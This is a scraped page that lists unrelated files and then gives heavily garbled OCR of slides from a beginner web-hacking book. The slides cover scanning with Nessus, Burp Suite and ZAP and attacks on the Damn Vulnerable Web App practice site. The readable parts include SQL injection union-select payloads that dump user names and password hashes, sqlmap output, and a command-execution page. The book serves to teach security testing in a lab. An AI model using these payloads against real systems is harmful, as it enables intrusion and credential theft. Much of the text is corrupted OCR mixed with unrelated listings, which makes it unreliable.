Home assignment II on Spectroscopy 2024 Answers.pdf
Home assignment II on Spectroscopy 2024 Answers.pdfHome assignment II on Spectroscopy 2024 Answers.pdf
Home assignment II on Spectroscopy 2024 Answers.pdf
 
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfWelcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdf
 
A Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in EducationA Strategic Approach: GenAI in Education
A Strategic Approach: GenAI in Education
 
Thesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.pptThesis Statement for students diagnonsed withADHD.ppt
Thesis Statement for students diagnonsed withADHD.ppt
 
Honest Reviews of Tim Han LMA Course Program.pptx
Honest Reviews of Tim Han LMA Course Program.pptxHonest Reviews of Tim Han LMA Course Program.pptx
Honest Reviews of Tim Han LMA Course Program.pptx
 
A Survey of Techniques for Maximizing LLM Performance.pptx
A Survey of Techniques for Maximizing LLM Performance.pptxA Survey of Techniques for Maximizing LLM Performance.pptx
A Survey of Techniques for Maximizing LLM Performance.pptx
 
Model Attribute Check Company Auto Property
Model Attribute Check Company Auto PropertyModel Attribute Check Company Auto Property
Model Attribute Check Company Auto Property
 
Unit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdfUnit 8 - Information and Communication Technology (Paper I).pdf
Unit 8 - Information and Communication Technology (Paper I).pdf
 
Supporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptxSupporting (UKRI) OA monographs at Salford.pptx
Supporting (UKRI) OA monographs at Salford.pptx
 
The basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptxThe basics of sentences session 5pptx.pptx
The basics of sentences session 5pptx.pptx
 
Chapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptxChapter 3 - Islamic Banking Products and Services.pptx
Chapter 3 - Islamic Banking Products and Services.pptx
 
1.4 modern child centered education - mahatma gandhi-2.pptx
1.4 modern child centered education - mahatma gandhi-2.pptx1.4 modern child centered education - mahatma gandhi-2.pptx
1.4 modern child centered education - mahatma gandhi-2.pptx
 
2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...2024.06.01 Introducing a competency framework for languag learning materials ...
2024.06.01 Introducing a competency framework for languag learning materials ...
 
Introduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp NetworkIntroduction to AI for Nonprofits with Tapp Network
Introduction to AI for Nonprofits with Tapp Network
 
Marketing internship report file for MBA
Marketing internship report file for MBAMarketing internship report file for MBA
Marketing internship report file for MBA
 
Unit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdfUnit 2- Research Aptitude (UGC NET Paper I).pdf
Unit 2- Research Aptitude (UGC NET Paper I).pdf
 

The basics web hacking

  • 1. : 0 0 UJ * 0 z >i/) A / THE BASICSOF WEB HACKING ToolsandTechniques toAttack the Web I I, lil ,i II Ell ! a II. ii i i Josh Paul 1W
  • 2. AMSTERDAM * BOSTON * HEIDELBERG * LONDON NEWYORK * OXFORD -PARIS * SAN DIEGO SAN EKANaSGO ‘SINGAPORE* SYDNEY •TOKYO ELSEVIER Synuress is ,m Imprint pf Elsevier
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8. R[i Working together to grow libraries in asEV[FJt developing countries www.elsevier.com •www,bookaid.org
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 33. 'Unsaved Document l X if/bin/fcash echo -e w-hrt -g «* jrn Vul narahl H0h Ann Tnsraller s.i'i'lnt M"in : * Save As.,,eefi ech DWVAjnstall.stÿecfic ecfic td t ichc Name: Save in folder: jurnot v + Browse for other foldersecfic rn i ecfic Character Encoding: Current Locate fUTF-8) T Line Ending: | Unis/Linux V ecfic cd / ecfic Cancel Save Applications Places System I'. 1 * Damn Vulnerable Web App (DVWAJ - Login - Mozilla Fircfox File £dtc view History Bookmarks Tools Help Damn vul neraWe Web App (DV .. f§) BE http://i?7.o.aIflogm.php HBackTtiacfc Unus Security ||Expfcut-DB V4|rcra(:l<'r'(J I]SEORG.c DV/WAy Username admin PjlUfrOM ll
  • 34. M Login if the database already exists. it wiil&e cleared and the data win t* reset Backend Database: MySQL Create i Reset Database | Database has been created. Users' table was created. Data Inserted Into 'users' table. ’guestbook;' table was created Data Inserted Into 'guestbook' table. setup successful!
  • 35. DWVA Security 1 Script Security SscunLy Level 1$ currently low You can aet mu security tavul to low, medium or lnÿn Ttve secufily levÿJ change* tins vuiiwafiinly lev<?i <H DYWfi, 10* _ * $L*fnit
  • 36.
  • 37.
  • 38.
  • 39.
  • 40. [>.1JKOE.I SUSfl University O, 13E.247.6-4.140/ FUTURE ETUDEMTS V CUSRENTETUDEfÿTS V FAOJLTYÿTAFF V PARENTSÿ?AMI L1 DAKOTA STATE TTCMSMOUir.WE'RESETUR,
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47.
  • 48. X O New Scan 5c» Trt. C**C« EcVlftlKf l(*iVjn nr D.O 3 r Ciro**
  • 49. NeSSUS vuLnera bilfty scanner rs»i Htti Stwan 5*jn CM 1 SrS*.R4*utf RDiWi Ui*f* COftiÿfSton & Listing Scans + & Opbt« v E Scaji Tltki Created By Start Time v Status Mardi 23. 201313:03-11tocalhwt erncR I'M*
  • 50. 9 f/ localhDst check Q] AwwTre* X Daiew. Ai Ftefcrt* jft Hosts 127.0,0.1 ftnaftlodgje Base Filler tAitrtWibirrti&i © Utu-iLi 1004115/ I a D4 r 11 10 / IJ 04 U51 ij.10 op*>CIWKJl Ubunflji L«tf 5«U**y Ch«fc* © Uburtu 10 04 ITS i' E! K f II ID; 1304 Lts nrefcM regre.cmicji1 UUuiHÿ Lee*Specify Check* Uburtu 10 04 LT5/ I S.&fl 111.10/ 13 04 LTS- feeftm tUnc „cutKill U&gflUf LecatSratr ctwefcs LTbur-tu l0 04LTSr 11.04 111 lO Mi 04 LTS- : fcefcci m*w.critical y]3MniVi! L«#l5«ka% Cheski UEHJFAJ 10 04LTS; IS.04 f 11 10/ 12.04 LTS: frefca vijha...rrtIKJl IJbMnnr LocalSee!j*ty Chocks Uburfij 10 04 LTS/ 11.04 i* 11.10/ 12.0* ITS: EWHM-YH*. ..critical Ubunhii Local SaartCy Ctocki Ltauribl 10 0* LTSn!04 <ÿ 11 10 / 12.04 as; opeT*ÿ *UL..crttKai Ubuntu Lccai SecLÿfy Check! critical Ufcurftj 10 0* LTSJ111.10 / 1204 LTS/ 1210. frefe. ftflM... Ubuntu Local 5ecJTSK Checks crttfcal 10 O) LTS/1s.10 t 1204 LT$/1210 . fteta mat* . Ubunb LccaJ Secirty Checki crilkai Ubw«y 10 04 LTS/ 11.10 / 12 04 LTSr1210: fte*» ttgn Ubuntif Local SecdCy Checki RH k Faclof: C™Heal CVSS Base Score: 10.0 cvss Vector Score: CVSS&ttVN/AC LAu:N-C C'i;C A:C CVSS Temporal Vector: CV3S2#E POC.'RL OF RC.C CV5S Temporal Score; ?.B Vulneratality incoemaUon CPE: cp4j'o:cai>onieal.ubufilijJinux.1O.0J>.lu epcft eanofi*eal.ubunBu linu-jc:1 1 .04 epÿLfo.eanwMesl.ubuntu II/TUK I 1.10 epe ironltal:ytejnlij_iinu>i:12.0Jwits Ea pkrift Available: Erne Euptotla&llliy Eafrc. E*pl«toore avrulaWe Pateh Publication Date: 20 fi 207.'12 EupfotobtaWirtJi: MetawloiM Java Apples Field Bytfrcade Vender Cache Remote Code execution) Cor# impact Reference InfcrmÿUon eve: CVE-2012-1725 g/oratrzw lanÿijWSrjKjni tt»ji7=y:i jrarjpl u Y&;rff;B Lÿjÿtjkarrfj CVE-MU-ine I CvE-20T2-im I CVE-»12-|7Ti 15&1uin: wd; 53956 I 93954 I 63952 I 53951 I 53850 I 53949 I 53947 I 53946
  • 51. •*a 3 **1lP + o ! 2 S + w> P 11 i 5 L.fi c& * 3 ff £ iV* I* & s “ i 1 1f I i I El ? f l * 8a i 81 i 11 ill!illr. nn r s ? ft ft ft ft ft 3 i f s
  • 52.
  • 53.
  • 54.
  • 55.
  • 56.
  • 57.
  • 58.
  • 59.
  • 60.
  • 61.
  • 63. HXl I t HartTtitV •intwnrt M CHTlffi I Cc, Inform Ukin Oothwmg - 'll WnWWtfli*J *M«VnW - 0 EtÿOlJ'iwTiMlS j! P?L* cÿe E-stafaiion - if r1.: r'.til -rr-j- A' [ t’J’, IjT ftcyvst Engineering - FIFID-R»JS o SIIIH ttv.iNj rfi MUOtf*i!itySc-irih#j> x NeLwirt Amsimort WsbAwucaltori teraiment L iti CWSV nenl lily JoHUIuelon l*W> AocfkOtJonfitrrerj R£ AFpiirnliOnS335 Wit Open Source AsiKsmtrt S**ggy/sOVUneraHlltyita m ' W .Sw*!(ÿ Wfco t; hrrpwHf1 't t*<TS(l“iajl i ' Firefox Preferences k •• a & oGeneral Tabs Content Applications Privacy Security Sync Advanced General Network update Encryption Connection Configure how firefox connects to the internet Settings...
  • 64. * connection settings configure Proxies to Access the internet O No proxy O Auto detect proxy settings for this network O iise system proxy settings O Manual proxy configuration: Port: SOSO * Ea use this proxy serverfor all protocols HTTP Proxy: 127.0.0.1 SOSO *SSL Proxy: 127.0,0.1 Pÿrt: soaoi‘FTP Proxy 127.0,0.1 Port: soao rSOfikSHost: 127,0.0.1 Por[: T O SOCÿS v*- © SOCKSy5 No Proxy for Exampie; .mozilia.org. .net.rli, 192.168.1.0/24 O Automatic proxy configuration URL: Reload Help cancel OK
  • 65.
  • 66. * bmp Mjili fur cd-HI-sn Ml.4 Wp -TiVMi IÿHIKBT m+&m iOM i&lfm (*•••- I P4»V*W «*«ÿ#( IJHMM !_ F hdrÿ n*4 Ieu4 A«TTB. !K3H>;111 **• ti-z-J. eJc W*># ncWiphp #nAnjcl>HTk pÿp •*ÿ a} »»*v<F-e** j'HJfJiP'JtrM-m 1 Wl «rv4ar .k,-4a#, -a-Ji- liTj*] m ' -ipfÿa* ' ' rtfinh" -» m__! I IMvi- feuSd F!i-r !V C St. r +pr - M!p >nJT.D.BLS Jirr.4Lfi.ij .+.«(.»*is i itu FW L rs-_i ;
  • 67.
  • 68. v x burp suite free edition vl.4A burp intruder repeater window about target t prow I spider T f intruder [ repeater [ÿsequencer 1 decoder | comparer I control ! options | settings [aiacheck robots,<xt @ detect custom ’not found' responses * ignore links to non-ted content 0 request the root gf ell directories 0 make a non-parameterised request to each dynamic page maximum link depth: monitor burp proxy tratfk E> passively spider as you browse link depth to associate with proxy requests; 0
  • 69. forms 7individuate forms by; action UHL method and fields -don't subpurt forms prompt for guidance * siutomatteall/submit using the following rules to assign parameter values; .field name hold value fwienen@example.04nn [Peter~ [wiener_ _ match * egex mail * regex first regex last * reqex surname y regex ___comp edit A remove up Peter Wienername downtier Consulting -CSltflLnjfti: regex_ addr Main Street UrfiAne-ruillA .... i » add £ set unmatched fields to; [555-5b5-Q199@exafnpte.com_ 5 iterate all values of submit fields -max submissions per term; 10
  • 70.
  • 71.
  • 72.
  • 73. *V fiiCtlhKll 4 Grjphici # IIH«H« m offlif - ( lnHormatror.ÿHI-tnrr; VVJnenfeHlty - 0 [.ÿpti>rj[n5i,iT«U - Mvitfge EKHtiDt* . If K' l n(i) i r/j AtttM v Reverse Enflinwi ‘ J( RFlDIWi. .1. WmeraBI ry li.smffi iAfciJÿpHewion Aiietamrt CWflbow A«evjmen« gj MSVU it'ilily !ÿ!.-: 'I!'ÿ.-! ;:ÿÿ ' & W ' on : '46' W?D ApUlcaUnif Prnsirs ;j£ tuft:ÿ Dpei.Sou .e hie •, me( r We*Mintrabitity Seamen iil I, Sounrtfi video Q Syiimn T«H* J Wine *ÿ bnrpsune wasp-zap o ienwsTfcicifta Fafcnicf flepoirir -j 1Wv (P ? Mlxdineeu _ * OWASP ZAP SSL Root f A certificate ft SSL won't work if you haven't created and imported an ” OWASP 2(iP CA root certificate. Vou can create such a certificate any time in the options menu, so you do not have to create it right now. Gener... Go to options panel and create certificate now Later Mot now. but create certificate later.
  • 74. 3 -a bb E N “ O <3 jE or o >H- dDi H IN JC Q E ii§i'ÿ!ÿSll||slf 13ala l£L|fl t>v|UlJN K|U H > >xOÿ > V C> = ti « « -j P A +.J "*ÿ> 3 C 3 *Ut*»2»gt5H$aiI»S gtssiliesgs . I t ¥ 4 ta|St sd sMSI?t sa: =SeSii3¥ililTfgi5SÿeS! : t iffI15S3 21£ 88£S i 3V : 5ÿ£S2ÿ|iib#ga!giitea3gÿE 0 £ * -5 f 7 > r S5 c 3H t V y K M LLI UJ -li Z V T L>J<|JlO!t'|-lAM yj M " J u 3 'v i v x LU z « u i ii- _i ui LL Sfeasi fegsisass sssÿ&c =§£Eÿf = 8-*. I-* £ JO Z £ £ JC rÿi U ¥t r-r * —1 ~3- C »- tj tj i- isli=3llj«*Sasls«-igi81 i? N H S 9 ffl Ci k- TQ Offl 4 &riX-nÿ * Cl X r4 O' n Q Li Z 5 n U- T CL OJ. '--. OJ U K <V 3E JQ « H(ÿZIi.llJ££Q<v04|Ufl4l5actÿH 1 | N V V >- +' T. F* J 50 S'ff >ZE * » ZX£fZxr-oaHCUJC4,£N440ti-s.|| rr CPÿ * ffl IUl 3 £ ::ÿ i :'- i: : 1 <j?£ T S ri C l-ÿi <ru 3 3 _ 5z L I/ d. :_• “V JT g £ Ss “ I s S . u »i iSiliu 0%tK ? g i |f|,S f 5 14-1# s ! B s ts Li C o H -L £ J * f
  • 75. IH Applications Places System Q - - * Untitled Session - OWASP ZAP Eile Edit View Analyse Report Tools Help L j ki W i"l 3 3 *“ l> 0 JSitesc*- Request Raw View Attack_ GETiinc GETJOC . P0£T:k |j_J dVwa Igfr vulnera " J_I http;// : at- http://saf< Active Scan sit* Active Scan node Spider site Brute Force site Port scan host r. Exclude from Ron application Delete (from view) Purge (from DB) Resends. VSew In Browser Break.., c t y 1 1 *1 Cookie: PHI DNT: 1 Content-lei [ History ™ [ Searth |BreaX Feints X|tins f*1 Scan ?) ]Spider |Brute Furte/|Pert Start ' |Fufflfrf |Output| Current Xsnj;!Site: l*7,0,0,1 UPl found during cravnl: httf U127 P P ]/itoT*r]t/rc-5:Q-D uni found but out of trawl scope: --ÿ r-r rr«rr.nr.™f™ ~ -•Vt • *V-irV» 11 -.. owaip orqulndex php,fifap_10_3Q<l,7-AJ f History 1Search |Break Points X~| Aiortÿ f*T[ Active Stÿn |Spldorÿfj j~Port Scan ' "[ FmardTTOutput| Site: 1J7.U. U. 1 T L J Current Scans:l $Et httpM17.OSKMffil,l$e4175}17mMf 1.p*ip SET Frttp:J/l 27,0,0.1l&*«m2G2375060775356264.php GEf ktpiW127,0,0,1/dWHftiii-S-10706641574067586 GET littp:,'/127.0.0.17dvA a.' mag-?s/ea*63413iJ$9217163S SET l-rttpz/yi27.0,0,1ftlvwaAncludeV3125536246617472704.php SET http;tVl27,O,0,l,rdÿ'Vrfl/liitli.id“G.'DEMS77207'jl00S7 3PE3O9340. php 404 Not Pound 404 Not Found 404 Not Found 404 Not Found 404 Not Found 404 Not Found Sms 2mG 4mi Sms 3ms tms
  • 76. (SET hnp:JBa7.Q>0LÿJIdw«J]iAÿ?aa?*5W5t>3ÿ753 4Q4 Not Foynd 4m*; Current Seans " 1 vjrQ V:(T..h | Pyir.f,. _ j 4|.V|V, j 4.'; i ...S; Sj" ll-r j Brut': F 0 . , t'vH 'j'.i'i ,F i . T tier.. * at SOL ln|eitiort Fingerprint Irtg 14) _ hutpij/l27,0.0.17dvwa/intludes/DBMS/?C-S;0-D'IHjE( ISQl Injeetlon i mo-H-f pcinl in<7 Risk: 1*High Reliability: Suspkiouo Rarameter: username-admlnt password passwardit,oijin-l,oijlnfli27IfyjECTJ DtKKFttofl B ht(p:(yl27 0.0. lfl agin pnp htr p:yyl J7.di.di.1ftetup.php Jut p-lll 27.0.0.1wlnerabiliNes/fiidpage -include.php illI*SQL lfi|e(tion (4 ) •t ij - Directory Drowsing (7) aJ -Cookie set wthoot HttpOnJy fta-g <«) .i*i . Password Auteeomplel* in brwrter <?1) SQL injection may be possible. othrf inf*
  • 77. * Save j j at i IJ&J i a j rÿn i j»i tLook Ini _i iool Lÿj Desktop ZAp.htmlFile Name; 3Files OfType; ASCII KTML Me £antetSave
  • 78. | History j Search , Break F'ointo |4Jerts | Achve Scan "• | Spider [ Brute Force _-|Fort Scan : I Fuser j direttory-tet-Z3smai.txt j*) flfl USitfrj127,0.0.1 0% Kivvp..ii .w»v*11 uVI 1 .ri_iÿ(uJ-| ifj'iijj.!u.v;i.,'.JlJ|Uii i JI J.pi .j_‘ li IW i i iMiJVV hit pmJ7.Q.Q.L:ao/external/phplds/0,e/t*startoverage/ httpm27.0.o.ltaMcori5/ htt pm27. O.O.LiBQ/index/ hittp-:/7Li'7. 0.0,l:8Q/irr:t ructions/ ht[ p:Hi27.0.0. L:BO/login/ httpm.27. 0-0.1:e0/loqpuitr hfttps//l27.0,0.1rSQ/set urity/ httpm27. 0.0. L:80/5etup/ httpm2" 0. 0. L:80rvutnereblitie; htt p:m27.0.0. L:BOMilnerebrlitie *b ruter htt pm27. 0-0.1:8QAfljlneret..l-t14c/ctrt.' http:ffl27. 0.0. L:SQtojInerabiht1e5/e*ec/ httpm27, 0.0,1:80/Vulnereb:lities.fir htt piff],27.0.0. Li80/vulnerebilitles/iqli/ httpc//l27.0-0,1;80Milnerabililtlesftÿ|)lln<lt htt pm27. o_o, L:OOtailnerebilrt1* -voplorid r htt pm27. 0.0. L;80A/uinereb;hties/viewhelp.pbp htt pm27. 0.0. L;80/vulnerabilitle sMeÿsource.php htt pm2 7. 0.0. L:SOMjIn erebditle c.rvi ew_sour<eÿall php httpM27.0,0d;:SOMiJtrwrabflltlestes jt htt p:/ÿ27.0.0.1;80/YiJlneratgtj#5/i<ss_5y 200 OK 200 OK 302 Found 302 Found 200 Ok 302 Found 302 Found 200 Ok 200 Ok 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found 302 Found Current
  • 79. Active scanning wnard Actively sc jpi nm tuple items Vou have selected 71 items for active scanning Before commuing you can use (He titleJSSslow to remove certam ateaones of Hems. let make yo ur scan mug more ta rgetted and efficlent t. remove duplicate items isamÿ 'jRLand parameters) [2 nems| . ] remove Hems already scanned (same URL attfjparamotars) [35 items) LJ remove out-of-scope Hems [22 Hems) ? remove items AITII media responses [0* items) Q remove items Aim the foitoAmjextensions [0 Items] is gitjpg.pnp.e5s Note Seme o< irto solected items do not yet hav* responsos it you tnoose to remove items mAh mefl ia responses some of these Hems may be te rupee d from me scan when their responses ha*e been analysed. cancel next
  • 80. I (?) burp suite professional vl2 burp intruder r-e-p =ati r window help target piunr ' spider-!' scanner [ intruder ' repealei tosiJte~f scan queue } Iwoscanrung | options ] sequencer ! decoder ! comparer [ corruns ' alerts j1 issues requests errorspair .....3H& . _ ] L 'V cft-i'p Jf**. complete 5% compete 2 T 5ÿ4 complete Jcomplete complete B jia% tompi4te_ B 55%-:omp?tte 1 Tiniibe-d fl Insertion points is ' I i*osl ________ J_ibibsJSwwr.mv... ftontacisfilSifDefaumspic hrtcpp tfoww my fcgntiiclsf1OMlOpfiClN 8>px 13 [Mpts>hww.rnr-. ItMbdiflOUQeau&MjHC htpt jrwwin mv I'crediicardsii.'Default asps _jiniHaa'Pwwwmv... rompnnwasnfPafaiHtasjM 6 IllllpsJlftSfflMrJnT... 'femplOpeasrUDefault asp* https JJWWW m> diiefschangeti ffEMsufl asp1 'ÿ I'l i. Ill, ..-v <ÿ' 11 -tn I T-'O..-liu 1 iif 4 rltpi -'Miti nn inviss.'!.1 j10 __https m, rprefsnrDvfauil.aspt 11 blips ffwww my. . Iprels'l ' Defaull.SSpic 1: hEPS 'ÿ'i.j.-j. m, '50 jr( hr I lOÿOMt J cp Mps:fftywwjmv... fsearchfl3JlefaullLas(w httpjJl'r.v.'w my fsearc hf1 1341 129 114 IS ”6 7 i 1Jh 7 125 1C 131 128 If ic: s 134 5 complete _ WillUlJ_ 1 13 14 waiting
  • 81. lean 26' j 1 nmf |fmiiihtd j .my4patDrÿfkigi n/102/Defeurtnihx wsues | basg (aflutist | 6as» response |_ O SQL injection ashtsorj [ requestl [ resportsei j request? f response? | ft SQL injection Issue Seventy High Confidence Certain Hast Path SQL injertion https:fhnim.myapp.com .‘lflgili'IOZ'TJeftiiJt.iiishi; Issue detail The username parameter appears to be vulnerable to SQL intention attacks A suigj; fixate was submitted lei the username parameter, and a database error message was returned Two smÿe quote? weet then sybmnted and the error message disappeared You should review the contents of the error message, and the application's handing of other input, to confirm whether a vuinerabihty LS pr«en1 The database appears la be Microsoft SQL Server
  • 82. (ÿ) burp mils- prdftiikinal vL2 burp intruder reefer window help spiderÿ] scanner Intruder | repeater sequencer decoder f comparer comms alertstarget ' prosy results live scanning j_op1ionsscan queue ? https ;'www iTryapp.com <ÿ OSOL injection [4| O KTTP header Injection f O Cross-site scripting (reflected!) S') O ''searchil fPeTaurt asp* lSearchTerm parameter) OisearttiMMMauHaspxjSeafciiTami parameterÿ ? LDAP Injection Open redirection Password Geld with autocomplete enabled X SSL tooktewrtlTOut secure flag set X Cookie without HttpOnly flag set >ÿ x Cacheable HTTPS response ji 0] X KTML does not spetrty charset |2] i / o- i admin *- O toniacts credrtcards i derautt.html *- ? employees *- X fileenchange news o- 6- «- O profs v O search :'t O 12 advisory request responsei' O Default aspx 0 Cross-site scripting {reflected} issue Severity. Confidence Certain Host Path Cross-site ftcripting (ioileded| High https: wrtw.myapp.com Sexdi 12itMaub.aspx
  • 83.
  • 84.
  • 85.
  • 86.
  • 87. Welcome to Damn Vulnerable Web AppfHunt Dmn Vulnerable App (OVWA1 * PHP.'My&QL we4> rrwi is linmn vuinMflHe lie main gwj*s am to N an ,1 a tor joeun'y pmtwsiorKiti Is ;«i thf/ir $Ki s and loo1- in a legal orwrcnmonl. tayÿ web devi*fl(Kiri MKIflf r«JCif.1aixJ Iny (iHJCessw Of Securing wots aÿlienLkitij. Stfid nirj |i»ebi>C!i.:slLxiiniK lo icadvlc.nn vioh appiical o« security in a TilWIT room env.rcrunenl Instructions Setup WARNING!Brato Force Command Execution m+ DJtrvn VJnwmvo W» App is damn vuirHHiWe! Donot upload it toyotf hosting provider's pgplie html Tokfef Of any internet rating web server as it Mill be compromised Wo recommend or J.-, ilcvu IVJ and Instating onto 3 local machine inside your LAN wfwrh Is used soloty for losing. Disclaimer CSRF File Inclusion SQL Injection w* do not ts*o iiwpofisiW.iy fv tho wjy .n Mh«;h (my ono uses this epputtfitn we have mado the purpose* of the appdcaiion clear and it should not ho used ma&ciou&ly. We Nave given ivaimngs and taken measures to prevent users from install- ng QWVA on 1o tire A1*!smm |[ your wo* senior is compnom -s<!d v ia an installation at OVWA it Is not our responseHty it is TJv? respccisIDHity of !ho personis wm uploaded and installed It General Instructions SQL Injection (Blind) Upload I IX5S M'tLl-J XSS stored The ndp puHon allon* you Ii> vie* rttsftips for each v ulnoratrlily and for each son jfly levin on thou lospective P*3«tDVWJl Security PHPlnlO About Logout
  • 88.
  • 89. Vulnerability: SQL injection User ID; | Sutunil ID: Rellk' or 'a' »’a First name: admin Surname; admin ID: Rellk1 or 'a" -'a First name: Gordon Surname: Brown ID; Rellk' or "a" ='a First name: ttack Surname; He ID: Rellk- or First name: Pablo Surname: Picasso ‘a- -a ID: Rellk' or ‘o' «'a First name: Bob Surname: Smith
  • 90. v x burp suite free edition v1.4.01A burp intruder repeater window about target Intruderscannerproxy spider repeater sequencer 11 intercept options | history 1 request to http;//l 27.0,0.1:80 forward drop intercept is on action raw j params j headers ' hex GET request to /vulnerabilities/sqli/ valuetype name Rellk%27+or+%27a%2?%3D%27aURL id Submit SubmitURL PHPSESSID iTi7cOuorvt8mBsgdd[bv5o|4ue2cookie cookie lowsecurity
  • 91.
  • 92. User ID: | Suborn j ID: Rellk* DT l-l union select null, database!) 4 First name: admin Surname: admin ID: Rellk' or 1=1 union select null, database!) a First name: Gordon Surname: Hr own ID: Rellk* or 1=1 union select null, database!) # First name; Hack Surname: Me ID: Rellk* of 1-1 union select null, database!) H First name: Pablo Surname: Picasso ID: Rellk* or 1=1 union select null, database!) * First name: Bob Surname: Smith &ID: Rellk* or First name; Surname: dvwa on select null, database!) # ID: Rellk* and l-l union select null, table name from information schema -tables First name: Surname: guestbook C? * ID: Rellk1 and First name: Surname: users n select null, table name from information schema . tables ID: Rellk* and 1=1 union select null, table name from information schema .tables First name: Surname: columns priu ID: Rellk' and 1=1 union select null, tahle name from information schema , tables First name: Surname: db # M ID: Rellk* and 1=1 union select null, table name from information schema. tables First name; Surname: event #
  • 93. UseT ID: Submit TO: Rell*' and First name: Surname: users user td 1=1 union select null, concat (table name , 0x0a.column name l TO: Ret Ik J and First name: Surname: users first name 1-1 union select null, coneat f table name, 0x0a,column name) ID: Rellk' and First name: surname: users last name 1-1 union select null, concat ( table nane, GxDa, column name) 10: KellkÿAd r : I : user l-l union select null, concati table name fextta, column name I 10: Rellk' arÿÿi-1 union select null, concatltable name, Gx8a, column name) Surname passwoi ID: Rellk' and 1-1 union select null, concat (table nam0rGxflap column name I First name: Surname: users avatar
  • 94. User ID: |_5ubmlt ID: Rel lk ' ami 1-1 union select First name: Surname: admin t bf4dcc3bbaa7G5d&ld03?7debGB7cf99 jftcaU user.exBa. password) from users st ID: ftellk' and 1-1 union select null, concatl user.GxGa. password) from users 2 First name: Surname: gordonb Cr993lBC423cb3Bdbf2f.08b3t.7&9;72ee3 ID: Rellk' and 1-1 union select null, coocaf loser, G-xOa, password) from users 2 First name: Surname?: 1337 3d3533d75ae2c3966d7eed4fcc69316b ID: Rellk' end 1-1 union select null, concat (user ,e-s5a, password) from users 2 First name: Surname: pablo ()d1a7d B9f b bbe4&t ade3de5cJ1e9e9b7 ID: Rellk* <ind 1-1 union select null, cculCStluSer , 9x03, password) from- users M First name; Surname: smithy bf 4dcc3bbaa76bd6ld3327[]|[?&BB2ef99
  • 95. A v v ‘unsaved Document l -gedit file Edit View Search Tools Documents Help Save W UndoOpen T * ‘Unsaved Document 1 X adnvi n:5f4dtc3b5aa765d6ld3327debfl02c f 99 go rdonbte99a lBt42B£b38d5U6OB5367B92:je03 1337:8d3533d75ae2c3966d7e6d4f cc69216b pablo:ad18?d G9f5hbe46tade3de5171e9e9b7 smi thy:5f4dcC3b5aa765d6Ld8327deb362t f 99j Plain Text T Tab Width: ST In 5, Col 40 INS
  • 96.
  • 97. v x burp suite free edition vl.4.01 burp intruder repeater window .about target j proxy j' spider [' s | intercept 1'intruder |f repeater f sequencer decoder 1 comparer ]' optiorcanne options 1 history request to http:tfl2".0.0.1:80 forward drop intercept is on action if parents [ header? | hexraw GET vulne Lain ilit ies/3C|li/?id=l (Submit*Slavic HTTP i.l 8ost: 127.d,0.1 tisec-Ayent: frillla/5.0 tXllf LlmUf ±£QCt tv:ia.Q.2' Geefco/QOIOGIOI Ficetax/10.0.2 Accept ; text /html , AIP-I)1 icat im/xhtbl-Kadl, app1icat ion 'Knilrrc[_0. &. */ *;<[_0 ,e Accept-Langtiaÿe: en-113. en; q=0. 5 Accept-Encoding: deflate Fcoxy-oonntccion: lceep-|ilive P-eCfter ; http:f l137 ,a.D. 1/vwlnetabi A ities/flcjii/7iti“2 Cookie: PHPSESSlDMDc IrkSvqi-lsBkkqacueoSSf I:L7; security*!-,. 1 FIS;48:35] (INFQl the back-end DBMS IS MySQL [18:48:35] flMFO] fetching banner web server operating system: Linux ubuntu 18.64 {Lucid Lynx) web application technology; PUP 5.3,2. Apache 2,2.14 back-end DBMS operating system: Linux Ubuntu back-end DBMS: MySQL 5.0 banner; '5.1,41- 3ubuntul2 , lGt"
  • 98. E18:48:35] f INFO]: fetching cur 'ent database current database; 'dvwa' .1] ft] IN] [i ft r " "ql r tTtT1] [19:02:20] f TNFO ] fetching columns for table users' on database 'dvwa' Database; dvwa Table: users [6 columns] + | Column I Type back *ÿ + va rctiar(76) varcharUS] varetiar(15) varctiar(32) varcbar(15} int (6} avatar first name last name password user userid +
  • 99. [19:65:58) [INFO) postprocessing table dump Database: dvwa Table: users [5 entries] | password | user user id 5f4dce3b5aa765d6lde327deb832tf99 (password) | admin e99a1Bc42Beb38d5f269853678922e93 ( abC123) Bd3533d75ae2c3966d7eed4fcc692i6b (Charley) edl07de9f5bbe4Gcade3de5c71e9e9b7 (letmein) 5f4dcc3b5aa765d61d8327deb8S3&f« (pÿWd) L I gordonb | 2 I 1337 1 3 r1
  • 100.
  • 101. Vulnerability: Command Execution Ping for FREE Enter an IP address below I’lHG 127.0.0.1 <t!!?.0.(). 1> 1 0J J bytes of data. 64 bytes from 127,0,0,1: ur.p seq-1 ltl-64 tLireÿ0.050 ms 64 bytes from 127.0,0.1; nip spq =3 ttl-64 nme=r{i.96fi ns 64 bytes from 177.9.6.1: itmp seq-li 11 1. -Ci 4 t J irve-B.95? s. 127.0,0.1 ping statistics --- 3 packets transmitted. 3 received, packet Loss, time JS&lms rtt min/avg/fliax/mdev - e.Obzyo. 060/0.066/9.me ms
